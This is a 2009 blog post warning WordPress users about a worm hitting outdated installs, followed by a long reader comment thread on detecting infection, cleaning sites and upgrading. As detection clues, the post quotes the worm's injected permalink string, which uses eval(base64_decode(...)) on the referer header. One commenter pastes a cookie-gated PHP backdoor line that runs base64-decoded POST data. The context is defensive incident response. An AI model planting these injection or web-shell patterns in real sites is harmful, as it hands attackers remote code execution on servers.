Skip navigation

Old WordPress Versions Under Attack

WordPress NewsOtto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an “attack” on older versions of right now. The number of sites hit by this is growing every hour. Protect your WordPress blog now: UPDATE NOW!!!

Update your WordPress blog before you continue reading this post. That’s how critical this issue is.

Things You Need to Know Now

Here is what you need to know right now, constantly updated with news as we get it.

  1. UPDATE NOW! Reports are that this attack impacts ALL versions of WordPress up to 2.8.3 and 2.8.4, the most recent release.
  2. Report from WordPress on Attack: How to Keep WordPress Secure. Information on the most recent update of WordPress that prevented this attack on updated WordPress sites: WordPress 2.8.4: Security Release.
  3. Which Version of WordPress is Secure? I’ve just talked to Matt Mullenweg and have a better understanding of the version confusion. When this worm first hit the web, WordPress released 2.8.3 to deal with it. Since then, WordPress 2.8.4 was released, unrelated to the worm. Once the worm has infected your site, surface fixes do not remove the “back door” the worm injects into your database and system, as happened with Robert Scoble. Once infected, upgrading does not fix the issue, so those reporting they were now infected after upgrading, were infected before upgrading. Versions after WordPress 2.8.3 are safe, but upgrade to 2.8.4 anyway as it included other fixes.
  4. What Version Am I Using? If you are using a WordPress version after 2.7, the nag screen on the WordPress Administration Panels will alert you to upgrade. If you are using an older version, upgrade now. Don’t know what version you are using? Without a nag screen to tell you to update, you’re using an old version. Checking the Administration Panels footer will help, but don’t waste time looking. Just update now!
  5. Use a WordPress Plugin for Protection: Do not rely upon a WordPress Plugin to protect you. There are many reports of Plugins that will “help” in the comments. While they might help in other ways, please upgrade now. That is the only solution if your site has not been impacted.
  6. How Does This Worm Work? We’re awaiting details from security experts on how this worm works. Personally, I’m waiting for the name of this thing since that does make searching for details on this worm easier. Anyone got a name for it yet? Since it isn’t exclusive to WordPress, calling it the WordPress Worm would not be appropriate. :D
  7. WordPress is Not Secure: WordPress is incredibly secure and monitored constantly by experts in web security. This attack was well anticipated and so far, WordPress 2.8.4 is holding. If necessary, WordPress will immediately release a update with further security improvements. WordPress is used by governments, huge corporations, and me, around the world. Millions of bloggers are using WordPress.com. Have faith they are working overtime to monitor this situation and protect your blog.
  8. Fear of Upgrading: This attack is serious enough to overcome all your fears of updating. If older WordPress Plugins are holding you back, update them to the latest version or replace them with new. If your Theme might break, contact the Theme author and update or replace it. There are thousands of free Themes to choose from, probably some better than what you are using. If you are using a recent version of WordPress, updating is as easy as clicking a couple buttons. If you are using an older version, download the most recent version and upgrade now.
  9. Other Issues? Whatever your issue is that keeps you from updating WordPress, get over it and update now to protect your site.

When we have updated news, we’ll add them to this post and/or post a new article.

How Do I Know If My Site Has Already Been Attacked?

There are two clues that your WordPress site has been attacked.

There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”

The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.

WordPress.com blogs are not impacted as they are up-to-date. Only versions prior to WordPress 2.8.4 are impacted.

To Prevent Your WordPress Blog from Attack

To prevent this form of attack, update your WordPress site IMMEDIATELY to the latest version. Change ALL passwords to a strong password immediately, including WordPress blog access for all users, database, FTP, control panels, everything.

See the articles below for more helpful information on how to harden and protect your WordPress blog.

If Your WordPress Blog Has Been Attacked

If your site has already been attacked, it appears that the hack attacks the database, going deep. You can find help in the WordPress Codex article on how to deal with a hacked WordPress site.

We’re looking for specific solutions, but the easiest appears to be to export all your content with the built-in XML WordPress export (pre 2.1 versions, try the WordPress-to-WordPress Import WordPress Plugin) and literally remove your WordPress installation totally (save images and general files). DO NOT EXPORT YOUR DATABASE! Install the latest version of WordPress and add the “clean” backup of your WordPress Theme, then import the XML export. The export will contain your posts, Pages, and comments, and hopefully no other hacked code.

How To Completely Clean Your Hacked WordPress Installation” by Smackdown is a good article on how to reinstall WordPress after being hacked, but take care to keep your export limited to the post content and comments (and Pages), not the entire database as the hack goes into the database.

How to Respond to a WordPress Attack

WordPress has been requesting users update as soon as an update is released for several years. They also now have a excellent team to track down this issue and quickly protect WordPress with any necessary updates.

Please blog and Twitter about the attacks. It’s important that we spread the information throughout the WordPress Community as fast as possible, encouraging everyone to update WordPress. Take care not to promote rumors, just the facts, until we know more.

If you have pertinent information that will help the WordPress team track down and stop this attack, please report it to security@wordpress.org.

Check the for more information and support. Also check for news and announcements on security issues and updates on the and in your WordPress blog Dashboard Panel.

Please, keep your WordPress site constantly updated. You are now informed of updates directly through the Administration Panels. Act upon it.

Here are some other articles and information that may prove useful.


Feed on Lorelle on WordPress Subscribe Feedburner iconVia Feedburner Subscribe by Email

Copyright Lorelle VanFossen, member of the 9Rules Network, and author of Blogging Tips, What Bloggers Won't Tell You About Blogging.

197 Comments

  1. sillyandrea
    Posted September 4, 2009 at 3:48 pm | Permalink

    And close off user registration.

    • Posted September 4, 2009 at 3:54 pm | Permalink

      Closing off user registration may not help protect your WordPress blog in this case.

    • Bashir Ahmed
      Posted July 4, 2013 at 3:29 pm | Permalink

      I agree with Lorelle, you can disable user registration on your blog but it will not help you to protect your blog. The best thing is always use up to date WP version, plugins and themes.

      Make sure scan the themes before installing. Use WP security plugins like “Better WP Security”. Don’t use “admin” username. Change the defualt wp_ table to something else.

      Use Login Lockdown plugin to protect your blog from un-authorized login attempts. There are many things you can do to protect your blog.

    • Posted July 5, 2013 at 8:57 am | Permalink

      All good advice. Thank you. Isn’t it amazing we have all these tools, many of them free, to help protect our sites from the evil. I love the WordPress Community.

  2. Cathy Tibbles
    Posted September 4, 2009 at 4:16 pm | Permalink

    Great article – thank you!!

  3. Posted September 4, 2009 at 4:33 pm | Permalink

    They should be able to see the user in the admin area if they turn off javascript on their browser before they load the page.

    • Brisbane
      Posted June 6, 2011 at 4:01 am | Permalink

      Hi Ron,
      I have also tried. but I am not able to see the user in admin area.i have turn off JavaScript on browser also. can you please tell me on your side how it works?

    • Posted June 6, 2011 at 2:15 pm | Permalink

      This doesn’t always work with this hack, but to turn off the JavaScript on the browser, either use an extension for your browser or go into the options and disable JavaScript. It might require a restart of your browser to make this work.

  4. Posted September 4, 2009 at 4:36 pm | Permalink

    I left my WordPress installation at version 2.7 until last week when I found that somebody somehow managed to disable and delete the Askimet plugin.

    This let a whole bunch of spam comments onto the site until I upgraded WordPress and reinstalled the plugin.

  5. Posted September 4, 2009 at 4:46 pm | Permalink

    Thank You.My wordpess will update

  6. Posted September 4, 2009 at 5:14 pm | Permalink

    I really don’t get why people don’t upgrade. It’s easy to do and just plain stupid not to.

  7. Posted September 4, 2009 at 6:15 pm | Permalink

    Hey thanks for the info.. Updating my WordPress blog..

    • Posted September 5, 2009 at 8:43 am | Permalink

      To All: There are a lot of Plugin recommendations here, some old, some new. Please do not rely upon a WordPress Plugin to help you with this issue. Simply upgrade to the latest version of WordPress NOW!

      @Kashif Aziz: If you are using the Ultimate Tag Warrior WordPress Plugin on your WordPress blog, you are at risk of more problems. That Plugin has been discontinued for over two years. Tagging is built into WordPress now, using many of that Plugin’s capabilities. Please update and use the conversion tool that comes with the most recent versions of WordPress and stop using that Plugin – now.

      @DG: The latest version of WordPress is about 2.8.4. WordPress 2.8.1 is not the latest. There are reports of attacks on 2.8.3. Upgrade now.

  8. Posted September 4, 2009 at 8:06 pm | Permalink

    Hi Lorella, as I posted in a previous comment the attack also includes a new user “WordPress” with access level “Admin” and e-mail address www@www.com. This user must also be deleted manually from the DB since it does not show up in the users panel.

  9. Posted September 4, 2009 at 9:02 pm | Permalink

    Lorelle, another quick way to see if there is a problem is to look at your users and add them up. If the Administrators, Authors, Subscribers, etc. all add up to less than what the “All” number is, then you have hidden users, which means you have indeed been hacked.

  10. Posted September 4, 2009 at 9:58 pm | Permalink

    There are so many things that people can do to protect themselves from a wordpress attack (that most bloggers don’t do), like renaming the database tables from the default wp_, moving the wp-config file out of the public html area, adding in the 4 secret codes from the wordpress.com API tool, backing up a database, using a plugin like Semi-Secure Login Reimagined or Login Lockdown, adding an .htaccess file to wp-content/uploads to restrict to only image uploads, and even adding an .htaccess file to wp-admin restricting by password or only your IP address (or both!).

    Probably the best free plugin to come out this year is WordPress Firewall – which detects these types of attacks and shows redirects to the home page or 404 instead (and it can email you when attacks happen). Of course updating is ALWAYS the best prevention. I have a whole completely free WordPress security guide on my blog, and from that free series I have been getting all kinds of new clients that need to have their hacked blogs fixed and cleaned. Take preventative measures beforehand so you don’t have to do that!

  11. Posted September 4, 2009 at 10:07 pm | Permalink

    Lorelle,

    This is quite helpful– just found a friend’s wp site hacked this morning and didn’t understand why until your explanation.

    Would you know what versions are “safe”? Most of our blogs are on 2.8.2

  12. Posted September 4, 2009 at 10:54 pm | Permalink

    Excellent article Lorelle. The section and resources you gave on ‘what to do after an attack’ is fantastic. It’s sad to think that most webmasters/bloggers never think of that part until after the fact. And you can NEVER find that information when you’re panicking and angry!

  13. Posted September 4, 2009 at 11:25 pm | Permalink

    I agree with Alex, I don’t get why users don’t upgrade ASAP.
    I upgrade about 80 blogs in average when there is a new update. It is easier to update then than when they get hacked.

  14. Posted September 4, 2009 at 11:47 pm | Permalink

    Regrettably, Astroengine.com was hacked this morning. Usually I’m up to date, but as I’ve been out of town, I haven’t been as careful as usual. This time it was to my detriment.

    A friend alerted me to the fact he couldn’t access links to my articles. The URL was totally out of whack (exactly as mentioned in this article). And another user had appeared.

    I’ve now deleted the extra user from the db (plus the last three that looked suspicious), and upgraded. Going to do a complete reinstall tomorrow morning.

    This is most certainly a case of “lesson learned” for me!

    Thanks for the prompt post and solution!

    Cheers, Ian

  15. rasarab
    Posted September 5, 2009 at 3:52 am | Permalink

    thanks for the info

  16. Posted September 5, 2009 at 5:05 am | Permalink

    @Alex and @Miroslav Sometimes you have to wait with upgrading your blog because not all used plugins work properly with the new release.

    And sometimes you will be forced to do it anyway, like now.

  17. Posted September 5, 2009 at 5:48 am | Permalink

    another reason to update my wordpress

    i just found that someone could reset my password just by adding some code to the login URL in the end of my site link. i used wordpress 2.8.2

    after updating to 2.8.4, that trick needs my confirmation before resetting my pass

    just for your info,,,

  18. Posted September 5, 2009 at 6:30 am | Permalink

    WordPress security must be taken seriously… I would recommend:

    -Install a logging plugin to it (to alert on new attacks, and get an audit trail of everything that is going on):

    http://www.ossec.net/wpsyslog2

    -Monitor your site on real time. This free online tool will notify you if your site is ever modified by an attacker or blacklisted:

    http://www.sucuri.net

    -Stay updated. This link can verify the version of your wordpress site and check if you have any vulnerable plugin or incorrect server config:

    http://sucuri.net/index.php?page=scan

    Thanks,

  19. Posted September 5, 2009 at 6:45 am | Permalink

    This case wasn’t new to me. Happened to me before and I’ve learned my lesson. Here’s my post about it if you may allow.

  20. _ck_
    Posted September 5, 2009 at 7:25 am | Permalink

    Install this simple plugin on any WordPress to block bad queries like that:

    http://pastebin.com/f6697b79

    It could easily be expanded to also look at $_POST data which is another form of attack you’ll never see in your logs.

  21. DG
    Posted September 5, 2009 at 7:41 am | Permalink

    Sorry! but it’s not only happening on older WordPress softwares, but also on newest WordPress 2.8.1. The spammer are sending tons of RFIs and spam query strings, resulting in tons of 404s – draining bandwidth & resources.

    Wish some someone from WordPress community come to rescue with HTACCESS knowledge.

    DG…

  22. Posted September 5, 2009 at 7:43 am | Permalink

    To prevent this from happening, I think it’s good if you install the Login Lockdown plugin. It’s also good to delete immediately the admin account and create a new one (not named admin of course) with all access.

  23. Posted September 5, 2009 at 8:16 am | Permalink

    I had one of my blogs attacked, a plugin and wp-config were changed. I traced the infected files by watching the timestamp and edited them to remove the malicious code. Fine now.

    I have a question about upgrading to new version. On one of my blogs I am using Ultra Tag Warrior to manage tags. While WP has an import feature, I am facing two issues:

    1. There are more than 15,000 tags and import script times out after a while. I tried extending PHP script execution time up to 10 minutes but not working.

    2. Current tag hirearchy is site.com/content/tag-name while WP offers site.com/tag/tag-name. If I upgrade to new version, my old structure will be lost.

    Comments?

  24. Posted September 5, 2009 at 8:42 am | Permalink

    This is why I always upgrade to the latest version the soonest possible. I can’t imagine what would happen if my blog is hacked.

  25. Posted September 5, 2009 at 9:26 am | Permalink

    Thanks for the info.. Good thing I just upgraded my wordpress a week ago :P I have a question though… does this incident prove that wordpress is not as secure as joomla or drupal?

  26. Posted September 5, 2009 at 9:57 am | Permalink

    Thanks for info. Have upgraded mine from 2.8.2

  27. s13ky
    Posted September 5, 2009 at 10:41 am | Permalink

    Hi Lorelle,

    How do we know which version of WordPress we’re using? It’s kinda horrible to imagine that the blog is hacked.

    Thanks

  28. Posted September 5, 2009 at 10:43 am | Permalink

    Last month this kind of attack, attacked my joomla website…it takes hours to clean it as you have to open all files an clear the script.

  29. Posted September 5, 2009 at 11:23 am | Permalink

    Alex: Beyond plug-ins, sometimes hand-crafted themes require rewriting before an update to WP will work. If they’re not coordinated, the blog crashes at worst; looks ugly at best.

    Is there any information about where these attacks are coming from? RU, UA, CN?

    A future update to WP could usefully include a means of blocking entire country domains! I get nothing but trash from those three, though there are other offenders. If this means that my blog isn’t visible in some countries, I can probably life with it.

  30. Posted September 5, 2009 at 11:41 am | Permalink

    I cleaned up a site that had the described hack (long string:%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.). Please look to your permalinks configuration first. I removed the string and the hack has not returned in 5 days, which tells me it’s not a database issue otherwise it would return. I may be wrong, but this is my direct experience with this hack thus far.

  31. Posted September 5, 2009 at 11:43 am | Permalink

    The fact that you have to keep patching critical security flaws is not an indication that WordPress is “incredibly secure”. It’s an indication of a serious problem. WordPress is one of the most insecure pieces of software in existence and after years of security issues its developers are still struggling with basic web security vulnerabilities. The vast majority of these problems (such as sql injection, cross site scripting and authentication bypasses) could have been avoided if security played any role in WordPress software architecture and coding standards. Unfortunately, the WordPress team still don’t have a clue how to develop robust and secure software and their users are paying the price for that.

  32. Posted September 5, 2009 at 11:47 am | Permalink

    I stumbled upon this issue by accident, but unfortunately I was one who was compromised. I have no use for my blog any more, so I’ve deleted it and the database. But for everyone else, can we get some confirmation about what this exploit can be used for? Does it install a backdoor console? Can the attacker access files in another directory? Does it just allow an attacker to steal blog passwords / spam? Does it try and exploit vulnerable browsers / browser plugins? Does it act as a downloader for malware? I’m surprised nobody has asked these questions before.

  33. Maniquí
    Posted September 5, 2009 at 12:52 pm | Permalink

    Easy fix: install Textpattern and forget about this upgrade frenzy.

  34. Posted September 5, 2009 at 1:06 pm | Permalink

    Maniquí – a) that’s not helpful, and b) suggesting that switching to a CMS that gets attacked less just because it is much less widely used will make you immune to getting hacked is simply wrong:

    [Textpattern security vulnerability]

    s13ky – the version is listed in your dashboard of your WordPress admin control panel.

  35. Posted September 5, 2009 at 1:32 pm | Permalink

    I have had about 10 spam comments but no (conspicuous) 2nd admin user. Am I affected or not?

  36. Posted September 5, 2009 at 1:41 pm | Permalink

    thanks for the info.. I just upgraded my friend’s blog :)

  37. Posted September 5, 2009 at 2:35 pm | Permalink

    I updated to 2.8.4 when it was released and everything seems kosher on my blog, except that I woke up to 64 spam comments. (Spam is not kosher!) Is this related to the attack? I normally get, on average, one a day.

  38. Posted September 5, 2009 at 3:40 pm | Permalink

    @Lorelle: I really want to upgrade but the issue, as I mentioned earlier, is that I am unable to find a way to migrate my current tag structure (site.com/content/tag-name) to WP tags (which are site.com/tag/tag-name). Any recommendations on this?

  39. Brad Hefta-Gaub
    Posted September 5, 2009 at 4:31 pm | Permalink

    I’m looking for more specific details on the attack. Has someone done the analysis to determine what method was used for the attack? What was the patch that actually fixes the problem? Was this a SQL injection attack? Was this some kind of an attack related to a know application level entry point?

    Thanks.

  40. Posted September 5, 2009 at 4:36 pm | Permalink

    @Brad Hefta-Gaub

    I have actually done a complete analysis about a month ago when 20+ of my blogs got attacked. The attack is actually a worm, meaning it’s automated and will use WordPress login page to either, “brute-attack” for passwords on the admin username.

    Either way, if ANY worm gets a hold of your WordPress admin panel, it’s likely that they can do anything they want besides permalink changes. At that time, they were doing iframe injections and also inserting invisible a href tags to malware sites.

    The point is, you need to “disable” the registration page so it stops hackers right now. Unless you have an absolute need for user registrations, I highly suggest to turn them off as you don’t know if there’s more vulnerabilities.

  41. Jamal
    Posted September 5, 2009 at 5:13 pm | Permalink

    Thanks for the info ..

    Updated :)

  42. Posted September 5, 2009 at 7:05 pm | Permalink

    Just fixed my blog at http://www.fncgamesblog.com to rid it of the messed-up link structure of the attack. Upgraded to the latest version also.

  43. J Reed
    Posted September 5, 2009 at 8:26 pm | Permalink

    I use IP security.

    • Posted September 5, 2009 at 9:19 pm | Permalink

      @Brad Hefta-Gaub and @Grayda: Of course the WordPress team and members of the community are tracking this issue and have asked all these questions, more frequently than we do. See WordPress 2.8.4: Security Release.

      @Kashif Aziz: Using the built-in WordPress tags conversion feature, convert tags from UTW. Recent versions of WordPress have canonical link redirects, so you should not have any redirection issues. Then either set the pretty permalinks however you want them, or get rid of the odd ball structure. Either way, that silliness is not worth delaying upgrading your blog. Your blog’s safety is MORE important.

      @ZenMonkey: Just upgrade Akismet and you’ll be fine. Along with all kinds of things, spam is just a way of life and I’m sure that spammers are having a hey day today. There have been no reports of a relationship. Wish we could block spammers by upgrading WordPress. Maybe someday. :D

      @The Kotel Team: See reply to ZenMonkey.

      @Alexander Sotirov: It amazes me that so many people call “wolf” every time there is a security issue without any expertise or fact checking. When WordPress 2.8.4 was released a while ago, it was to patch security issues that had been discovered prior to any issue. As one of the many who have spent time inside the “hallowed halls” of WordPress, they have hired and are working with the world’s top experts in web, browser, and programming security. And let’s see, my computer just updated 12 times in the past seven days for OS and program updates, some for security as well as bugs. I’d say that proprietary software has a LONG way to go in general for security issues.

      @Michael Shearer: Cleaning up permalinks does not remove the “hidden” administrator and the back door this worm created.

      @John Burgess: Blocking whole countries is useless (for so many reasons) as there are many legitimate sites in those countries, too. Remember apartheid and all the attempts to put a wall around countries in the past? Never worked then, and won’t work on the web. People always find a way through.

      @momoc: Sorry your Joomla site was attacked by a similar worm. Luckily, with WordPress it doesn’t take hours to clean this up. And a quick upgrade prevents it. Does Joomla offer an upgrade to fix this for all Joomla users? I sure hope so. I fear this one is going to encourage more – against everything, not just WordPress.

      @s13ky: You got an answer, but I’ll add it here. The WordPress version is listed at the bottom footer of older versions of WordPress and in the WordPress Administration Panel called the “Dashboard” which gives a summary of your blog’s information in current versions.

  44. Jericho
    Posted September 5, 2009 at 9:29 pm | Permalink

    Lorelle: “have hired” and “are working” implies now and moving forward. I can assure you, just about everyone will be happy if that is the case.

    However, that is not how WordPress has operated in the past. It has always been difficult to report security issues, WP has not maintained a standard method for contact for security issues, many developers have ignored e-mails regarding vulnerabilities and there have been a long string of remote exploits that allowed an attacker to completely take over a given WP install, inject spam or worse.

    Further, your computer updating “12 times in the past seven days” makes me wonder what software you are using. Even with Windows running Firefox / Thunderbird / Java / Acrobat, you wouldn’t upgrade near that many times. Even if you magically had, it means the companies are patching the software and it is warning you of security issues. That does not speak to the (in)security of WordPress in any manner.

  45. Posted September 5, 2009 at 9:40 pm | Permalink

    I was able to remove the extra admin user in the wpuser and wpusermeta tables through phpmyadmin and then upgrading. After, I had to reset my permalinks, but everything seems to have come out rosy…

  46. Posted September 5, 2009 at 10:40 pm | Permalink

    This actually happened to me friday at 12:01 am, the minute I started a giveaway on the site. Luckily, after changing themes and realizing it was in the wordpress core, I upgraded wp without even finding this. Great advice, it worked immediately for me.

    Many other wp users will be lucky to have this info. You do great work! Thanks again!

  47. Posted September 5, 2009 at 11:34 pm | Permalink

    Thats true, I myself logged in to my admin dashboard and found a new user registered as administrator, first I thought that I have committed some mistake at wordpress options but found those to be ok. I instantly deleted the new admin user, upgraded the WordPress to the latest version (I was running 2.8.3) and then scanned the posts to see if there are any hidden Viagra links inserted but nothing was compromised.

  48. Brad Hefta-Gaub
    Posted September 6, 2009 at 12:07 am | Permalink

    @Lorelle – thanks for the link to the wordpress.org post. I had already seen that. It’s not exactly what I would describe as very detailed. But if that’s the best the wordpress team has come up with then, I guess that will have to do.

    I’m not a hater, quite the contrary, I’m a big fan. But candidly, this is not exactly the way a sophisticated software team handles security issues. A more standard approach would be to include a more detailed description of the attack and how the code fix actually addresses the attack.

    I realize this is not your responsibility, and you’re a very busy (and very valuable) resource to the WP community in general, so I’m not asking you to defend or react to this feedback. However, if you could please express that at least some of the community would like to see a more thorough (industry standard) handling of these types of events, I think it would go a long way toward addressing some of the concern that is being expressed about WP being insecure.

    Simply saying “stay up to date” is not a sufficient answer. That wouldn’t work for Unix or MySQL or Apache or many other quality server software packages, and it shouldn’t be acceptable to the WP team either. You are better than that!

    • Posted September 6, 2009 at 11:57 am | Permalink

      Actually, the How to Keep WordPress Secure article covers a lot. There are others with articles out there explaining how this worm works, especially as it attacked Joomla and other sites a few months ago, leading WordPress to release a security update to protect WordPress users.

      It is also general policy NOT to explain in graphic detail how an exploit that is ongoing. Update is a good answer, since the majority of users do not care nor need to know the reasons, they just want their blogs safe. However, there are many with less scrupples who are publishing this information.

  49. Brad Hefta-Gaub
    Posted September 6, 2009 at 12:12 pm | Permalink

    @Lorelle – I am sad to hear your reply, because candidly: it’s not at all in sync with industry standard best practices.

    WordPress is open source, so any vague sense of “security through obscurity” that comes from not publishing the details of the exploit is really naive. I can and will go to the source code, look at the diff and get the answer I am looking for. Any hacker could do the same, so by the wordpress team not publishing these details, they haven’t actually made it harder on hackers, they’ve only made it harder on security and IT professionals.

    I understand that the vast majority of wordpress users don’t need or want this info… and for them the “always upgrade” mantra is the best. But that’s not the way that real security professionals that need to operate software in mission critical settings operate.

    Again, I recognize that you’re the wrong person to preach to on this. You’re not a core developer on the team, and so you have little or no control over the policies that the team follows in these types of situations.

    But, your blog is a highly ranked and highly credible source. And so if anyone searches for detailed information on this or any other exploit, your blog will be top of the search results. So you do have influence.

    Please, please, I beg you… take this feedback in the constructive manner in which it is intended. I am not a hater — or a troll — or a drupal/typepad/joomla/etc/etc fanboy trying to diss on the wordpress team. I am a serious professional, raising a legitimate and constructive criticism of the processes used by the WP team to handle security issues like this.

    I am simply suggesting that the team could adopt different practices that would be more consistent with the best practices followed by teams like the Apache, MySQL, PHP, or *nix teams.

    Thank you for your time.

  50. bill
    Posted September 6, 2009 at 3:01 pm | Permalink

    help. When i tried to update I get this –

    Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 2357046 bytes) in /home/domainname/public_html/wp/wp-includes/http.php on line 1327

    • Posted September 7, 2009 at 12:05 am | Permalink

      @bill: It’s a memory server error. Check with your web host. You are probably on shared hosting.

      @Lucazzo: Comments that begin and end with [...] are trackbacks. If you cannot read them, it means your web browser cannot read that language.

  51. Posted September 6, 2009 at 5:06 pm | Permalink

    My upgrade to 2.8.4 was disastrous, it removed my website from view, even though the admin panel was accessible. After contacting my hosting company I was informed the 2.8.4 upgrade negatively impacted several themes. I’m using Quadruple Blue, I have for almost a year. Unfortunately, this wordpress theme will not ‘work’ with the update, so I had to revert back to 2.8.3. For all who say they don’t understand why people do not upgrade, this is my reason. Whether the 2.8.4 was rushed into implementation, or due diligence was not thorough enough in the testing phase, is unclear. What is clear is the fear of wordpress upgrades harming valid WP themes at any given time.

  52. Posted September 6, 2009 at 7:42 pm | Permalink

    ismyblogworking.com will check if your blog has been infected by the exploit, and warn you if it needs upgrading.

  53. Joseph
    Posted September 6, 2009 at 8:22 pm | Permalink

    Hey guys,

    I have wrote a PHP script to search & remove vulnerable code & any ‘extra’ admin found on your wordpress site.

    This script will also upgrade your wordpress to the latest version.

    No PHP system, exec or any regular execution command is used as i know some webhosts disable them… it will works as long as you have PHP 4/5 & curl function.

    What the script does
    ===============
    1. Search for vulnerable code
    2. Backup wp’s database
    3. Upgrade your wp to the latest

    Instructions:
    =========

    1. Download the script from http://www.mxhub.com/fix_update_wp.zip
    2. Upload to your wordpress directory where wp-config is reside
    3. Go to http://example.com/fix_update_wp.php to start the engine.
    4. Done.

    5. Give your feedback or report any problem.
    http://forums.mxhub.com/showthread.php?t=798

    My humble coding. Works for what i wanted. Hope it helps.
    -joseph

    • Posted September 6, 2009 at 11:56 pm | Permalink

      @Joseph: Thanks, however, I’ve been told that while this might remove the surface issues, it could still leave a backdoor open for hackers to get in. Hopefully, you’ve offered this to Automattic and the WordPress staff and development team for their vetting and to help others.

      Since so many are impacted by this, and so many of the quick fixes offered on the web don’t really clean out this worm, that the WordPress team may offer something more comprehensive.

      @TexasCowboy: It’s so easy to blame WordPress when it is a WordPress Theme issue. WordPress does not vet any Themes, other than cleaning them up for consistency and checking for spammy content or hidden evils when added to the official WordPress Theme Directory. A WordPress Theme is your responsibility and that of the author to keep it updated and functioning. Please contact the WordPress Theme author for an updated version. If they haven’t, consider switching to a newer free Theme.

      WordPress takes great care in the past couple of years to not make any upgrades that will negatively impact the majority of Themes and Plugins. Ones that are poorly coded or not supported and updated can fail to make the upgrade process, but if your Theme was updated and functioning from 2.8.3 to 2.8.4, you would have not noticed any changes, as none were made that impacted WordPress Themes.

      I understand the fear, but the WordPress Community works hard to educate everyone through every major release and upgrade, as well as the minor updates, on what changes and needs to change, and most of these are minor and easily implemented. With the new update announcements of Themes, Plugins, and the core of WordPress, you are seconds from knowing when an update is available and can easily update with a couple clicks.

  54. Posted September 6, 2009 at 10:07 pm | Permalink

    Is it possible that my plugins are compromised because of the attack?

    • Posted September 6, 2009 at 11:52 pm | Permalink

      @Aadi: The attack does not impact WordPress Plugins directly nor specifically. However, if you are using a Plugin that accesses permalinks or things that are impacted by the hack of the invading worm, the Plugins could be impacted, though not compromised.

  55. Posted September 6, 2009 at 10:36 pm | Permalink

    Thanks Lorelle, great article. Very comprehensive. I learned my lesson about a year ago when a Joomla site of mine was defaced. I also understand the balance between updating immediately and maintaining plugin and theme functionality. In this case, it’s obvious that the upgrade is more important. Fortunately, I upgraded all my WP sites ahead of time.

    Thanks again for all the great info!!!

  56. Posted September 7, 2009 at 3:43 am | Permalink

    Unfortunately, upgrading immediately is not possible for us. We are regression testing our code that interfaces with WordPress at the moment but it is likely to be weeks before we are ready to upgrade.

    Can you provide us with more details about the behaviour of the worm (such as user-agent, ip ranges, request strings, etc.) so we can block it by other means.

    I know that this is not a good long term solution but it seems crazy to just sit here, unprotected by anything at all, until we can safely upgrade WordPress.

  57. sammo
    Posted September 7, 2009 at 4:34 am | Permalink

    Nice write up. When did this exploit start? Do you know? I upgraded to 2.8.4 a couple of days after that version was available and I’ve just checked my sites and found 2 of them with this exploit. I have both the weird URL structure and additonal user in my db.

  58. karachoooo
    Posted September 7, 2009 at 5:28 am | Permalink

    Who says that WP 2.8.4 is not vulnerable to the current hack? Some pplz are reporting their 2.8.4 blogs were compromised as well.

  59. DG
    Posted September 7, 2009 at 5:58 am | Permalink

    Lorelle,

    Sorry! for confusion, it was a typo error; what I mean is the attacks are continue in the form of RFIs and other spam query strings, that’re just drowning all bandwidth & other resources.

    The attacks are from .cn, kr., ru. .net, .com and more domains. I’ve tried to blocks a lot of them using mod_rewrite, as collected from web. But couldn’t block others, as I’m no htaccess guru.

    I think, some HTACCESS guru from WordPress community can easily help in writing proper rules to eliminate these attacks. If interested, I can provide more details (RFIs, spam query strings, and spam links).

    DG…

  60. Posted September 7, 2009 at 6:23 am | Permalink

    Lorelle, i saw your post and Mark announcement but there is no proof of concept of this worm. I checked milworm, BugTraq an othe full disclosure mailing lists and still there is no explanation of how this worm works in technical words, only the effects are explained.

    • Posted September 7, 2009 at 9:43 pm | Permalink

      @fwolf: If you are using a version of WordPress without an upgrade option, then, as said in the article, your site is out of date. Please upgrade.

      @Cliff Calderwood: Upgrading WordPress is now a single click. Don’t you wish all software was that easy. :D

      @Matteo Campofiorito: It’s a holiday weekend in the US. For those in the business of tracking these things, maybe they will have the news tomorrow. I’m sure there will soon be so much information about the details of how this worm works, we’ll be bored. :D In the meantime, why not read Fellow’s Paper on Worms, though it’s in German.

      @karachoooo: As stated in the article and the WordPress announcement, if your site has already been compromised, upgrading does not good. It will still be compromised.

      @sammo: This worm exploit started in its original form, to my limited understanding, a few months ago, prompting WordPress to immediately release WordPress 2.8.3. WordPress 2.8.3 and 2.8.4 are protected. The original reports of people with 2.8.3 being infected was due to them already having the worm infection before they upgraded. Once your site is impacted by the worm, upgrading will not resolve the issue. This round is impacting a lot of WordPress users, not just other platforms, and those who did not upgrade are at risk. If you have the “weird stuff” in your WordPress blog, your site is infected and upgrading will not fix it. You will have to follow the instructions in the article to try to do a clean reinstall, carefully.

      @Dave: The upgrade from very recent versions should not impact your development project. If it does, then you are not keeping up with what you will need to move forward in the future in general. And if it is a test site, then totally close it down to the public and password protect the whole thing, following typical security protection suggestions. Either way, details on the worm in its current form are just coming out. Check the WordPress Support Forum for details. I expect a lot of reports starting tomorrow once people get back from vacations.

  61. sammo
    Posted September 7, 2009 at 9:58 am | Permalink

    In addition to what I’ve already commented above. I’ve just found a dodgy php file in the root of the installs that contains

    if(md5($_COOKIE['fbfb439649881d6a'])==”3ddd13238886729c8f26ffc4e32c4658fc”){ eval(base64_decode($_POST['file'])); exit; }

  62. Posted September 7, 2009 at 10:10 am | Permalink

    I always suggest clients to upgrade whenever an update is available for the WordPress script. It’s the best way to protect yourself from being attacked!

  63. Joseph
    Posted September 7, 2009 at 10:25 am | Permalink

    @sammo: i just did a check over one of the affected wp sites.. no such line found..

  64. sammo
    Posted September 7, 2009 at 10:33 am | Permalink

    @joseph: The code I posted wasn’t the exact line. I changed the encoded elements to random stuff and it was all enclosed in <?php tags. Sorry, should have said. Don't know if that makes a difference. File date is 05/09/09.

  65. Joseph
    Posted September 7, 2009 at 10:43 am | Permalink

    @sammo:
    yea. i search for ‘md5($_COOKIE ‘ only. :D actually look through all the files which had mention of ‘md5(‘ & ‘_COOKIE’ as well.
    No line that look like what you posted.. ;)

